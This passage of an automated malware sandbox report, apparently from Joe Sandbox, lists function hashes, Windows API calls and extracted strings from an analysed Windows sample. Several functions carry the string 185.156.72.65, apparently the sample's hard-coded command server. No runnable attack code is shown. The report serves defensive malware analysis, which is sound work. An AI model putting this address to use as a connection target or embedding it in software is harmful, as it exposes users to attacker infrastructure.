                        • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                        • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustPointer
                        • String ID:
                        • API String ID: 1740715915-0
                        • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction ID: 5cc4e608ba870c86061b251413a45c7d5df544701d674f89a2be05a2e5113e03
                        • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction Fuzzy Hash: AE51A2B2601606AFEB29DF14D889BBA77A9EF40314F38453DDE054B6B0E731B954CB90
                        APIs
                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                        • GetLastError.KERNEL32 ref: 00417548
                        • __dosmaperr.LIBCMT ref: 0041754F
                        • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                        • __dosmaperr.LIBCMT ref: 00417590
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                        • String ID:
                        • API String ID: 1913693674-0
                        • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                        • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                        APIs
                          • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                        • GetLastError.KERNEL32 ref: 049677AF
                        • __dosmaperr.LIBCMT ref: 049677B6
                        • GetLastError.KERNEL32(?,?,?,?), ref: 049677F0
                        • __dosmaperr.LIBCMT ref: 049677F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                        • String ID:
                        • API String ID: 1913693674-0
                        • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction ID: 89fbce9ef6911b3f7a181470303265efeba8fc05d8566701dc68da8c1070cfd8
                        • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction Fuzzy Hash: 1E216271600605AFEB11EFA598C0C6BB7ADFF842AC7108579E91B97250E735FC50CBA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                        • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction ID: df6395ff5d616979d49be4c64c05c387649a92e6d41db2ca51b23fd16f764d07
                        • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction Fuzzy Hash: E6218E71204205AFAB20EF659C8197AB7AEEF842A87108935F91BDB160E730FC4087A0
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                        • String ID:
                        • API String ID: 158306478-0
                        • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                        • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                        APIs
                        • FreeLibrary.KERNEL32(00000000,?,049636EF,0495381E,?,00000000,04952AA0,04952AA2,?,04963868,00000022,00420B0C,00422950,00422958,04952AA0), ref: 049636A1
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction ID: 067c916b0eb0639cacaf8424bae5b75bf55862140bc37f4bcbf575502e0cae7c
                        • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction Fuzzy Hash: 6B21D231B01610BBCB319F65EC42B9A3B6D9B427A4B254235ED07A73A1EB30FD05C6D4
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 049686F4
                          • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496872C
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496874C
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                        • String ID:
                        • API String ID: 158306478-0
                        • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction ID: feb1a02ec53880696c5514432aa90a6bf02a22c72f3534a569fecb4c0ca89810
                        • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction Fuzzy Hash: 0611C4B66125197E77217B765CC8CAF3DADCEC91A87010534F90792100FA60FE0282B6
                        APIs
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                        • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                          • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                        • ___initconout.LIBCMT ref: 0041CC5B
                          • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                        • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                        APIs
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000), ref: 0496CEA6
                        • GetLastError.KERNEL32(?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000,?,0496A2C8,?), ref: 0496CEB2
                          • Part of subcall function 0496CE78: CloseHandle.KERNEL32(0042CA30,0496CEC2,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000), ref: 0496CE88
                        • ___initconout.LIBCMT ref: 0496CEC2
                          • Part of subcall function 0496CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0496CE69,0496CAF3,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CE4D
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CED7
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction ID: 525149c5109c89400660402c7a5a91214a4283679d32bd0e85d18a4c906a30fe
                        • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction Fuzzy Hash: 18F0AC36540158BBCF225F95EC08A9A7F36FF496A1B458030FA5A96120D732AC219BD4
                        APIs
                        • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                        • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                        • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                        • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                        • String ID:
                        • API String ID: 3269011525-0
                        • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                        • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                        • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                        • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorHandling__start
                        • String ID: pow
                        • API String ID: 3213639722-2276729525
                        • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                        • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                        • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                        • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                        APIs
                        • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                        • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                        • String ID: vector too long
                        • API String ID: 3646673767-2873823879
                        • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                        • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                        • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                        • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                        APIs
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0495BAA6
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0495BB5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 3480331319-1018135373
                        • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction ID: 0e7c3944bde18a15751221af0c1f39edf172653e307827899b3639b505ec047c
                        • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction Fuzzy Hash: 6C41A134E00219AFDF10DF68C884AAEBBF5AF45328F248175EC14AB365D771BA05CB91
                        APIs
                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EncodePointer
                        • String ID: MOC$RCC
                        • API String ID: 2118026453-2084237596
                        • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                        • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                        APIs
                        • RtlEncodePointer.NTDLL(00000000), ref: 0495C32C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EncodePointer
                        • String ID: MOC$RCC
                        • API String ID: 2118026453-2084237596
                        • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction ID: 469ca81cc88efd7d276d9fe38d2634b47bf2dc2cc48431cd51c1df6cbec78555
                        • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction Fuzzy Hash: BD412872900209AFDF16DF98C981EEEBBB9BF48304F248169FD15A7225D335A950DF50
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00401084
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 2296764815-2656946096
                        • Opcode ID: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                        • Instruction ID: 35b52d446d861aa170816ff75a143a42135cfe1fbea8b7bbecd3f4fad1973d83
                        • Opcode Fuzzy Hash: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                        • Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00401194
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 2296764815-2656946096
                        • Opcode ID: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                        • Instruction ID: 080c8299786e9307901dd30be4a7bf730519a23c54167f024b5206933e891779
                        • Opcode Fuzzy Hash: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                        • Instruction Fuzzy Hash: 5E217CB0F002409ACB24EFA4E8257A97BB0FF04308F50027EE5056B3D2D7B82945CB5D
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004012A4
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 2296764815-2656946096
                        • Opcode ID: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                        • Instruction ID: f3bdde1b4a8bc64e2f46b2d629ea0fd90e9d23492dc14d44f4e24dc008f4330a
                        • Opcode Fuzzy Hash: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                        • Instruction Fuzzy Hash: BA212274F002459ADB14FFA8E8157A97BB0BB00308F9041BED512BB2E2D7786901CB5D
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 0495150B
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 4132704954-2656946096
                        • Opcode ID: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                        • Instruction ID: b68f67b4c00690e181e770163d78a84ca3d00b31a65fe517a41e0cacc1b0a450
                        • Opcode Fuzzy Hash: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                        • Instruction Fuzzy Hash: 6521D4B4F002059AEB24EFB8E9157A87BB0AF05308FA141B9C9239B2B1D7756506CB59
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 049512EB
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 4132704954-2656946096
                        • Opcode ID: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                        • Instruction ID: 9e702a3d0036c6607689573dba1b7483ecbe6d04646fe19d8000a92ab8bf8a80
                        • Opcode Fuzzy Hash: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                        • Instruction Fuzzy Hash: 5A2137B0F00245DEEB14EFA8E9167A87BB0EB01308FA00179D84567360D7B56549CB5D
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 049513FB
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 4132704954-2656946096
                        • Opcode ID: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                        • Instruction ID: a02c709b0203582cfdba942107a8ff52fd0862dd8be4265b390dd0447ed87fa5
                        • Opcode Fuzzy Hash: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                        • Instruction Fuzzy Hash: 9321F5B0F00244DAEB24EFA4E9257A87BB0EF41308FA002B9DC055B260D7B56545CB59
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004084EE
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: G@ZK$[@G_
                        • API String ID: 2296764815-2338778587
                        • Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                        • Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
                        • Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                        • Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
